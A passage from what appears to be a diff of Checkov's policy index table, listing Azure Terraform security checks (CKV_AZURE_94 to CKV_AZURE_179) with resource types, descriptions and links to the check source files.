-| 1335 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) |
-| 1336 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) |
-| 1337 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) |
-| 1338 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) |
-| 1339 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) |
-| 1340 | CKV_AZURE_97 | resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) |
-| 1341 | CKV_AZURE_98 | resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) |
-| 1342 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) |
-| 1343 | CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) |
-| 1344 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) |
-| 1345 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) |
-| 1346 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) |
-| 1347 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) |
-| 1348 | CKV_AZURE_105 | resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) |
-| 1349 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) |
-| 1350 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure that API management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) |
-| 1351 | CKV_AZURE_108 | resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) |
-| 1352 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) |
-| 1353 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) |
-| 1354 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key vault enables soft delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) |
-| 1355 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) |
-| 1356 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) |
-| 1357 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) |
-| 1358 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) |
-| 1359 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) |
-| 1360 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) |
-| 1361 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) |
-| 1362 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) |
-| 1363 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) |
-| 1364 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) |
-| 1365 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) |
-| 1366 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) |
-| 1367 | CKV_AZURE_123 | resource | azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) |
-| 1368 | CKV_AZURE_124 | resource | azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) |
-| 1369 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) |
-| 1370 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) |
-| 1371 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) |
-| 1372 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) |
-| 1373 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | 
Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) | -| 1374 | CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) | -| 1375 | CKV_AZURE_131 | resource | azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) | -| 1376 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) | -| 1377 | CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) | -| 1378 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) | -| 1379 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) | -| 1380 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) | -| 1381 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) | -| 1382 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) | -| 1383 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) | -| 1384 | CKV_AZURE_140 | resource | azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) | -| 1385 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) | -| 1386 | CKV_AZURE_142 | resource | 
azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) | -| 1387 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) | -| 1388 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) | -| 1389 | CKV_AZURE_145 | resource | azurerm_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1390 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1391 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1392 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | 
[FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1393 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1394 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1395 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) | -| 1396 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) | -| 1397 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) | -| 1398 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | -| 
1399 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | -| 1400 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) | -| 1401 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) | -| 1402 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) | -| 1403 | CKV_AZURE_153 | resource | azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1404 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1405 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | 
[AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1406 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) | -| 1407 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) | -| 1408 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) | -| 1409 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) | -| 1410 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure that databricks workspace is not public | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) | -| 1411 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | 
[FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | -| 1412 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | -| 1413 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | -| 1414 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | -| 1415 | CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) | -| 1416 | CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) | -| 1417 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. 
| Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) | -| 1418 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) | -| 1419 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) | -| 1420 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) | -| 1421 | CKV_AZURE_167 | resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) | -| 1422 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | -| 1423 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. 
| Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | -| 1424 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) | -| 1425 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) | -| 1426 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) | -| 1427 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) | -| 1428 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) | -| 1429 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) | -| 1430 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | 
[PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) | -| 1431 | CKV_AZURE_176 | resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) | -| 1432 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | -| 1433 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | -| 1434 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | -| 1435 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | -| 1436 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1437 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | 
